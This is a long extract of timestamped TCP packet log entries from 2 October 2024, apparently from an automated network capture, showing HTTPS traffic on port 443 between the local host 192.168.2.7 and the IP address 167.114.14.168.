                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.755490065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.755826950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.836779118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.836801052 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.836873055 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.836906910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.836921930 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.836971045 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837122917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837147951 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837188005 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837194920 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837243080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837243080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837614059 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837634087 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837668896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837677002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837763071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.837763071 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.838248968 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.838268995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.838361979 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.838372946 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.838522911 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.838982105 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839004040 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839195967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839206934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839570999 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839596033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839617968 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839629889 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839653969 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839745998 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839821100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839839935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839890957 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839898109 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839946032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.839946032 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.845760107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.845778942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.845938921 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.845954895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.846084118 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939280033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939307928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939420938 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939420938 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939443111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939553022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939577103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939620018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939627886 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939660072 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.939714909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.940366983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.940386057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.940563917 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.940572977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.940850973 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.940892935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.940939903 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.940948009 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.940979958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.941174984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.941456079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.941485882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.941592932 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.941592932 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.941601992 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.941740036 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942141056 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942161083 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942241907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942241907 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942251921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942329884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942598104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942616940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942718983 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942718983 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942725897 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.942959070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.952653885 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.952686071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.952796936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.952796936 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.952805042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.952905893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.029815912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.029840946 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030164003 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030184031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030267000 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030430079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030452013 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030548096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030548096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030555964 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030596018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030869007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030889034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.030996084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031003952 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031702995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031728983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031764984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031786919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031804085 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031817913 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031827927 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031841993 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031851053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031866074 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031924963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.031924963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.032655954 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.032675028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.032964945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.032973051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.033195972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.033221006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.033293009 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.033309937 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.033368111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.033368111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.043137074 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.043155909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.043291092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.043291092 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.043306112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.045013905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.120517015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.120544910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.120665073 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.120665073 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.120678902 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121014118 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121057034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121078014 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121119976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121126890 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121166945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121241093 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121498108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121524096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121625900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121625900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.121633053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122041941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122066975 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122088909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122097015 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122107029 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122536898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122555971 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122581959 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122592926 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122603893 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.122617960 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123342037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123366117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123387098 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123394012 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123404026 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123471022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123471022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123847008 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123866081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123956919 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123956919 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.123965025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.124965906 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.129187107 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.133805037 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.133825064 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.133903027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.133912086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.133928061 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.133999109 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211188078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211209059 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211363077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211374998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211512089 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211626053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211647034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211744070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211744070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211754084 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.211848974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.212023020 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.212042093 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.212147951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.212147951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.212156057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.212558985 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.212781906 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.212802887 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.212910891 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.212922096 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.213071108 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.213094950 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.213188887 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.213197947 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.213212013 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.213876009 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.213895082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.214142084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.214162111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.214248896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.214613914 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.214634895 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.215120077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.215120077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.215128899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.215404034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.224304914 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.224324942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.224380016 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.224396944 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.224452019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.224490881 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.301855087 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.301876068 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302208900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302237988 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302356958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302387953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302427053 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302436113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302469015 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302494049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302833080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302853107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302957058 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302957058 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.302963972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.303427935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.303452969 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.303539038 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.303539038 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.303548098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.303777933 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.303796053 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.303937912 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.303946972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.304230928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.304521084 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.304547071 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.304605007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.304605007 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.304615974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.304718018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.305214882 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.305233955 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.305391073 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.305403948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.305818081 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.314891100 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:47.314910889 CEST44349713167.114.14.168192.168.2.7
